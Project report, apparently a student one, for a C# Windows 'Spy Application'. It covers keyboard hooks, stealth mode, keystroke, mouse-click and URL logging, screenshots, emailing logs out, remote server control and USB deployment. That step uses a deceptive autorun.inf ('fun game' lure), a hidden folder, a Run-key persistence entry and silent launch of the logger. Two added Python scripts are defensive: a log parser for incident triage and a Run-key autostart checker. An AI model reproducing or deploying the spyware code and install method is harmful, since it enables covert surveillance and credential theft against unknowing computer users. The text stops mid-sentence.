The .NET Framework provides no built-in facilities or infrastructure to handle hooks. But setting up hooks in .NET-centric apps is as easy as calling the underlying API functions, that is, SetWindowsHookEx to install a hook and UnhookWindowsHookEx to uninstall. To issue calls to Win32 API functions from within .NET applications, you must first import the desired API declarations into some sort of managed class.

Win32 API

The Microsoft Windows application programming interface (API) provides services used by all Windows-based applications. You can provide your application with a graphical user interface; access system resources such as memory and devices; display graphics and formatted text; incorporate audio, video, networking, or security. The Windows API can be used in all Windows-based applications. The same functions are generally supported on 32-bit and 64-bit Windows.

To use Win32 API functions we create a class Win32API with all the necessary declarations, so we could use these functions in our .NET application. You can see there the C# code to import all the Win32 definitions needed to handle hooks. Functions are imported as static, externally defined members of a new .NET class. Any .NET class can access the Win32API class and invoke members. When this happens, the P/Invoke infrastructure guarantees that the call is marshaled back and forth to the system API across the CLR.

For example:

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern IntPtr SetWindowsHookEx(int idHook,
        RootHook.PtrCALLBACK lpfn, IntPtr hMod, uint dwThreadId);

(the RootHook.PtrCALLBACK is the handle function pointer)

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
        IntPtr wParam, IntPtr lParam);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool UnhookWindowsHookEx(IntPtr hhk);

and now we can use these functions as regular static methods of the Win32API class.





Example of setting a hook in C#

After importing the necessary functions:

Setting the hook:

    using (Process curProcess = Process.GetCurrentProcess())
    using (ProcessModule curModule = curProcess.MainModule)
    {
        hookID = win32API.SetWindowsHookEx(WH_KEYBOARD_LL, CALLBACK,
            win32API.GetModuleHandle(curModule.ModuleName), 0);
    }

The CALLBACK parameter is the pointer to the handle function. In C#, the "pointer" is achieved by passing an instance of a delegate type, referring to the appropriate method. This is the method that will be called every time the hook is used.

An important point to note here is that the delegate instance needs to be stored in a member variable in the class. This is to prevent it being garbage collected as soon as the first method call ends.

As mentioned above, SetWindowsHookEx requires a pointer to the callback function that will be used to process the keyboard events. It expects a function with the following signature:

    LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);

The C# method for setting up a "pointer to a function" is to use a delegate, so the first step in giving SetWindowsHookEx what it needs is to declare a delegate with the right signature:

    private delegate IntPtr HookHandlerDelegate(int nCode, IntPtr wParam, ref KBDLLHOOKSTRUCT lParam);

And then write a callback method with the same signature, for example:

    private IntPtr HookCallback(int nCode, IntPtr wParam, ref KBDLLHOOKSTRUCT lParam)

nCode: the callback function should return the result of CallNextHookEx if this value is less than zero. Normal keyboard events will return an nCode of 0 or more.

wParam: This value indicates what type of event occurred: key up or key down, and whether the key pressed was a system key (left or right-hand Alt keys).

lParam: A structure to store precise information on the keystroke, such as the code of the key which was pressed. The structure is as follows:

    private struct KBDLLHOOKSTRUCT
    {
        public int vkCode;
        int scanCode;
        public int flags;
        int time;
        int dwExtraInfo;
    }

The two public fields are the only ones used by the callback method: vkCode returns the virtual key code, while flags indicates if this is an extended key (the Windows Start key, for instance) or if the Alt key was pressed at the same time. So this parameter is important to retrieve the information of the message we grabbed.

(Don't forget to call "CallNextHookEx(hookID, nCode, wParam, ref lParam);" in the function.)

Of course, to complete the "pointing" you must create an instance of your delegate:

    private HookHandlerDelegate proc;

and to link between the instance and the function:

    proc = new HookHandlerDelegate(HookCallback);

Finally, we must free the hook before exiting from the application:

    UnhookWindowsHookEx(hookID);

This way we were able to intercept any key pressed or any mouse click and to use it on the different occasions we needed to: making the KeyLogger and MouseLogger obviously, as well as using this in the URL hook, password checking, activity checking and more (each will be explained in the proper section).
















Client Application Running Mode

The main idea of the Spy Application is to monitor a computer. In this subchapter, we'll put our effort on describing the main options of the application.

Settings

When you first run the program, the application window appears with the tab "Settings" on top, as seen in the figure:

Figure

Settings, as can be understood from its name, is the tab where one can set the main options of the application and, of course, initiate the monitoring. An important notice is that before starting, one should examine and change the other tabs supervising a specific monitoring option rather than rely on the default options.

In the next sections, we shall describe the options available under the settings bar.

Stealth Mode

As explained earlier, the main idea of the application is to monitor one's computer. The option to run in stealth mode means that the application runs on one's computer without any form appearing on the screen (and without being noticed in the application manager); in other words the application becomes invisible. In order to stop the monitoring in stealth mode, one must choose under the settings tab 2 mandatory options:

- Key Combination: after starting the application, several key strokes that match the key combination that was inserted trigger a password window, which will be the gate for the closure of the application.

- Password: in the password window, the password inserted is to be matched with the one under the settings tab (which is hidden); a correct password will stop the monitoring and will open the form of the application.

Starting and Stopping Time

When starting the monitoring, there are several options regarding the beginning and the ending of the monitoring:

- Immediate: one can choose to initiate the monitoring as soon as he pushes the Start button. The ending will be initiated by him, as explained in earlier sections.

- Preordered: this secondary option allows the user to start the application and end it at a specific time, chosen by him.


















Key Logger

This tab supervises the key logging option. The general idea of key logging is that the key strokes of the monitored user are saved in a log file (in this application's case a *.html file) invisible to him. When choosing the tab "Key Logger", a window similar to the figure appears:

Figure

In the following section we shall describe the variety of options that this tab offers.

Options

When entering the addressed tab, one can choose either to perform key logging or not. If one chooses to perform key logging, he may choose to perform this action on several applications (meaning that the monitoring will be only on these selected programs) or to perform general key logging, transmitting into the log file any gathered keyboard information. One can also choose where to place the log files; this action is not mandatory, for a default path is already marked.

Log File

When the monitoring starts, an html file serves as a log file, and saves all of the keystrokes. The log file can be seen below:

    Process Name: explorer
    Window Name: Release
    28/03/2008 22:07:51
    hello world!

The log file prints, for any application in which a key was pressed, the following:

- Process name

- Window name

- Time of the first keystroke

As one can obviously understand, the user typed the words "hello world" at 28/03/2008 22:07:51, in the process explorer.






















Mouse Logger

This tab supervises the mouse logging option. The general idea of mouse logging is that the mouse strokes of the monitored user are saved in a log file (in this application's case a *.html file) invisible to him. When talking about mouse logging, we generally mean saving all of the right clicks the user pressed with the mouse.

When choosing the tab "Mouse Logger", a window similar to the figure appears:

Figure

In the following section we shall describe the variety of options that this tab offers.

Options

When entering the addressed tab, one can choose either to perform mouse logging or not. If one chooses to perform mouse logging, he may choose to perform this action on several applications (meaning that the monitoring will be only on these selected programs) or to perform general mouse logging, transmitting into the log file any gathered mouse information. One can also choose where to place the log files; this action is not mandatory, for a default path is already marked.




Log File

When the monitoring starts, an html file serves as a log file, and saves all of the right mouse clicks. The log file can be seen below:

    Process Name: explorer
    Window Name: Release
    28/03/2008 22:07:48
    Clicked spot is - 496, 53
    Clicked spot is - 496, 53

The log file prints, for any application in which the user clicked the mouse, the following:

- Process name

- Window name

- Time of the first right click

As one can obviously understand, the user clicked the mouse at 28/03/2008 22:07:48, in the process explorer.















URL Logger

This tab supervises the URL logging option. The general idea of URL logging is that the various websites visited by the monitored user are saved in a log file (in this application's case a *.html file) invisible to him.

When choosing the tab "URL Logger", a window similar to the figure appears:

Figure

In the following section we shall describe the variety of options that this tab offers.

Options

When entering the addressed tab, one can choose either to perform URL logging or not. One can choose where to place the log files; this action is not mandatory, for a default path is already marked.






Log File

When the monitoring starts, an html file serves as a log file, and saves all of the websites visited by the monitored user. The log file can be seen below:

    28/03/2008 22:07:48
    http://www.walla.co.il
    28/03/2008 22:10:34
    http://www.ynet.co.il

The log file saves for each website visited the hour and date of entrance, and of course the address of the website.
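The three log layouts shown in the Key Logger, Mouse Logger and URL Logger sections have a regular line structure, so a responder who recovers such files from a compromised machine can parse them to list which process/window pairs had keystrokes captured (the credentials or documents to treat as exposed) and which sites were recorded. The following Python parser is an added example, not code from the project: it reads the plain-text layout exactly as printed on this page (the project writes an .html file, and the surrounding markup is assumed to have been stripped first), the first block of each sample is the one printed above, and the second key-log block with process "notepad" is constructed to show a multi-block file.

```python
"""Parser for the key, mouse and URL log layouts shown above (added example, not project code)."""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Samples: the first block of each log is the one printed on this page; the second
# key-log block (process "notepad") is constructed to exercise multi-block parsing.
KEY_LOG_SAMPLE = """\
Process Name: explorer
Window Name: Release
28/03/2008 22:07:51
hello world!

Process Name: notepad
Window Name: Untitled - Notepad
28/03/2008 22:09:10
meeting notes
"""
MOUSE_LOG_SAMPLE = """\
Process Name: explorer
Window Name: Release
28/03/2008 22:07:48
Clicked spot is - 496, 53
Clicked spot is - 496, 53
"""
URL_LOG_SAMPLE = """\
28/03/2008 22:07:48
http://www.walla.co.il
28/03/2008 22:10:34
http://www.ynet.co.il
"""

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}$")
CLICK_RE = re.compile(r"^Clicked spot is - (\d+), (\d+)$")


def parse_ts(line: str) -> datetime:
    """Timestamps are day/month/year, as in the samples."""
    return datetime.strptime(line.strip(), "%d/%m/%Y %H:%M:%S")


@dataclass
class WindowRecord:
    process: str
    window: str
    first_event: datetime  # the log stores only the time of the first keystroke/click
    keystrokes: List[str] = field(default_factory=list)
    clicks: List[Tuple[int, int]] = field(default_factory=list)


def parse_window_log(text: str) -> List[WindowRecord]:
    """Key and mouse logs share one block layout:
    'Process Name:' / 'Window Name:' / timestamp / payload lines until the next block."""
    records: List[WindowRecord] = []
    current: Optional[WindowRecord] = None
    header: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process Name:"):
            header = {"process": line.split(":", 1)[1].strip()}
            current = None  # a new block starts; its timestamp has not been seen yet
        elif line.startswith("Window Name:"):
            header["window"] = line.split(":", 1)[1].strip()
        elif current is None and TS_RE.match(line):
            current = WindowRecord(header.get("process", "?"), header.get("window", "?"), parse_ts(line))
            records.append(current)
        elif current is not None:
            click = CLICK_RE.match(line)
            if click:
                current.clicks.append((int(click.group(1)), int(click.group(2))))
            else:
                current.keystrokes.append(line)
    return records


@dataclass
class UrlVisit:
    when: datetime
    url: str


def parse_url_log(text: str) -> List[UrlVisit]:
    """URL logs are timestamp / address pairs; a timestamp without an address is dropped."""
    visits: List[UrlVisit] = []
    pending: Optional[datetime] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if TS_RE.match(line):
            pending = parse_ts(line)
        elif pending is not None:
            visits.append(UrlVisit(pending, line))
            pending = None
    return visits


def exposed_windows(records: List[WindowRecord]) -> List[str]:
    """Distinct 'process / window' pairs in which keystrokes were captured: the triage
    list a responder uses to decide which credentials or documents to treat as exposed."""
    labels: List[str] = []
    for rec in records:
        label = f"{rec.process} / {rec.window}"
        if rec.keystrokes and label not in labels:
            labels.append(label)
    return labels
```

Because the log keeps only the time of the first keystroke per block, the parser cannot reconstruct per-key timing; the window name is the more useful field for triage, since a "Sign in" or password dialog title shows which account needs to be rotated.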

Image Recorder

This tab supervises the image recording option. The general idea of image recording is to create screenshots, in several ways, selected by the user.

When choosing the tab "Image Recorder", a window similar to the figure appears:

Figure

In the following section we shall describe the variety of options that this tab offers.


Options

When entering the addressed tab, one can choose either to perform Image Recording or not. One can choose where to place the log files; this action is not mandatory, for a default path is already marked.

There are 2 main ways to record an image, and they can be combined together:

- Time Intervals: choosing this option, a snapshot of the user's screen will be taken every several minutes, chosen by the user.

- Dangerous Key Strokes: whenever a selected key combination is pressed, a snapshot is taken.

Screenshots

The screenshots are saved as *.jpg files in the mentioned directory.

Remoting

This is the main tab for communication. By contrast to the other tabs, this tab doesn't supervise any logging done by the user; its sole purpose is to handle communication with the outer world.

When choosing the tab "Remoting", a window similar to the figure appears:

Figure


Options

The remote section includes 2 features:

- Initiate Communication: this option connects to a server, with an IP address or local name, as described by the user. This option will be discussed broadly in further sections.

- Send Email: this option takes all of the information (log files and screenshots) gathered from the user, and sends it to a user-typed email address from our own application's gmail account.




















Client & Server Application Running Mode

While most of the work can be done locally, it is advised to work through a remote server, in order to do truly stealth monitoring. In this subchapter, we'll put our effort on describing the remote options of our application.

Client

As described in earlier sections, when choosing the tab "Remoting", a window similar to the figure appears:

Figure

In order to initiate communication with a remote server, one must enter an IP address or local name. Once the information is inserted, the application searches for such a server and starts a connection with it. Once succeeded, the form becomes invisible and the server has the control for monitoring.






Server

This section describes a form, opened in a remote computer, waiting for an initialization request from a client. When starting the server application, it starts listening to requests and no form appears. Once the server gets a request from a remote client, the form appears on the screen.

The application server's form can be seen in the figure below:

Figure

The form allows us to control the monitoring remotely; the next sections intend to explain the various options which can be done remotely using the server application.

Enable and Disable

To start monitoring the remote user, one should press the button "Enable", which enables all of the monitoring described by the user early on in the client's form. If one chooses to disable the monitoring for some time, he may press "Disable".

Sending the Files

The files (meaning the log files and screenshots) can be sent from the remote client; the files are sent separately, sending each time the files which the user mentioned.

Ending the Monitoring

Whenever the user chooses, he can terminate the spy application at the client's computer.

Sending Email

The user can send an email to his email account via the application's gmail account rather than sending it directly.

Status

The user can detect whether the remote computer is used or not. The status of the monitored computer (Busy/Idle) can be seen in the form after the request is sent.























USB Spying Mode


This third running mode is considered to be the most advanced one: the true and fast
spying technique on any accessible PC.

For this purpose the following files are needed: autorun.inf, lilguy.ico, appinstall.exe,
svcshost.exe, server2.exe. Also, you must have a disk-on-key device to hold these
files.

Description:

We wanted to allow the user to make a quick install of the software on any
computer, making the software completely hidden and controlled by the server
running on the user's computer.

This feature allows the user to approach any PC, insert the disk-on-key device
containing the files mentioned, and with a single click install the software on the
computer, making it load and run (completely hidden) upon computer start-up (as
well as immediately upon inserting the device and choosing the correct option),
and connect to the remote server that the user runs on his private computer.

How it is done:

Autorun.inf



The Autorun.inf file must always be located in the root directory of your disk-on-key
device.

This feature for automatically starting programs on compact discs / disk-on-keys is
sometimes referred to as the Windows AutoRun technology.

When you insert the disc, Windows looks for Autorun.inf in the root directory
and, if it finds it, reads the file and interprets its contents.

We wrote in the Autorun.inf the following script:

    [autorun]
    icon=lilguy.ico
    open=appinstall.exe
    action=Click "OK" to play this fun game!
    shell\open\command=appinstall.exe


What it does: in the pop-up window that appears whenever you insert the disk,
there is one additional option (with the lilguy.ico icon beside it and the
text of the "action" entry; a snapshot can be seen on the next page). When you click it (and
then click "OK"), the computer runs the appinstall.exe file (to be explained later),
which, as we recall, is located on the disk as well.

The last command in the file allows appinstall.exe to be run in another way:

If you press Cancel in the pop-up window, and then go to My Computer and double-click
the disk-on-key drive there, appinstall.exe also executes.









Appinstall.exe

This application does the following things:

It creates an empty hidden folder with the path "My Documents\Files" (on each
computer, "My Documents" is automatically replaced by the local computer's
path to "My Documents").


    string new_directory = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
    new_directory += @"\Files";
    System.IO.Directory.CreateDirectory(new_directory);
    DirectoryInfo d = new DirectoryInfo(new_directory);
    d.Attributes = d.Attributes | FileAttributes.Hidden;


This is the folder which contains all the information produced by the spying
application.

Then, it copies the files "HOOK.exe" and "init.txt" (to be explained) to that directory.


    string CurrentPath = System.Windows.Forms.Application.StartupPath;

    File.Copy(CurrentPath + @"\HOOK.exe",
              Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\Files\HOOK.exe");

    File.Copy(CurrentPath + @"\init.txt",
              Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\Files\init.txt");


Afterwards, it changes the registry of the local computer so that each time the computer reboots, our
application will run as soon as Windows loads.

Explanation of this last feature:

The Windows Registry is a directory which stores settings and options for the
Microsoft Windows operating system. It contains information and settings for all the
hardware, operating system software, most non-operating system software, users,
preferences of the PC, etc. Whenever a user makes changes to Control Panel settings,
file associations, system policies, or most installed software, the changes are reflected
and stored in the registry. The registry also provides a window into the operation of
the kernel, exposing runtime information such as performance counters and currently
active hardware.

To see the registry you can go to Start -> Run and type "regedit".

The list of the applications that start as soon as Windows loads is located in:

HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows -> CurrentVersion -> Run.

The two code lines that add our application (after it has been copied to the local
computer) to this list are:




    RegistryKey rkApp = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);

    rkApp.SetValue("HOOK",
                   Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Files\\HOOK.exe");


And finally, appinstall.exe runs the HOOK.exe application (our spy software):




    Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\Files\HOOK.exe");


*Don't forget:

    using System.Diagnostics;
    using Microsoft.Win32;
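A Run-key value whose target sits under a user's My Documents folder, as the entry above does, is the kind of thing a defender looks for when reviewing autostart locations. The following Python script is an added example, not part of the project's code: it parses a `reg export` of the Run key (a constructed sample whose "HOOK" entry mirrors the one this report creates) and flags values whose executable lies outside the trusted install roots. The trusted root list is an assumption for the example.

```python
"""Flag Run-key autostart entries whose target lives in a user-writable path.

Added example, not part of the original project's code.  SAMPLE_EXPORT is a
constructed `reg export` whose "HOOK" value mirrors the entry in the report.
"""
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# Assumed trusted roots; anything else (profile folders, temp, removable
# media) is reported for review.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_run_values(export_text: str) -> dict:
    """Return name -> command for string values under RUN_KEY in a .reg export."""
    values, in_key = {}, False
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == RUN_KEY.lower()
            continue
        m = VALUE_RE.match(line) if in_key else None
        if m:
            # .reg exports escape backslashes and quotes inside string values.
            values[m.group(1)] = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
    return values


def executable_path(command: str) -> str:
    """Strip arguments: a quoted path, or an unquoted path ending in .exe."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    m = re.match(r"(.+?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command.split(" ")[0]


def suspicious_entries(values: dict) -> list:
    """(name, path) pairs whose target is outside TRUSTED_ROOTS."""
    return [(name, executable_path(cmd)) for name, cmd in values.items()
            if not executable_path(cmd).lower().startswith(TRUSTED_ROOTS)]


SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\Program Files\\Vendor\\upd.exe /silent"
"HOOK"="C:\\Documents and Settings\\alice\\My Documents\\Files\\HOOK.exe"
"""

if __name__ == "__main__":
    for name, path in suspicious_entries(parse_run_values(SAMPLE_EXPORT)):
        print(f"review: {name} -> {path}")
```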

Init.txt

In this spying technique, we support 2 running modes. One: each time the computer
restarts, the application starts running on its own, without connecting to the server.
Two: each time the application starts (on computer start-up and of course on the first
run right after the install) it immediately connects to our server running on the user's
computer.

This is the purpose of the init.txt file (which must also be on the disk): if it is
empty, the application will run in the first mode; otherwise you should write in it the name of
the computer host which runs the server (or its IP number, in which case the format
should be "ip insert_number"), and this way the application will connect to the server (specified in the init.txt file)
each time it loads.













Client
Implementation techniques & Code

Key Logger

When addressing the description of the implementation, we first need to install the
low-level keyboard hook which will intercept all of the keystrokes. After completing
this stage, we shall describe the key logging.

Initializing Keyboard Hook

In order to initiate the hook, we need to address 3 methods in user32.dll:

    SetWindowsHookEx, which sets up the keyboard hook

    UnhookWindowsHookEx, which removes the keyboard hook

    CallNextHookEx, which passes the keystroke information to the next
    application listening for keyboard events

In order to achieve this, the first step is to include the
System.Runtime.InteropServices namespace and import the API methods, starting
with SetWindowsHookEx.

We used a class for imported methods, called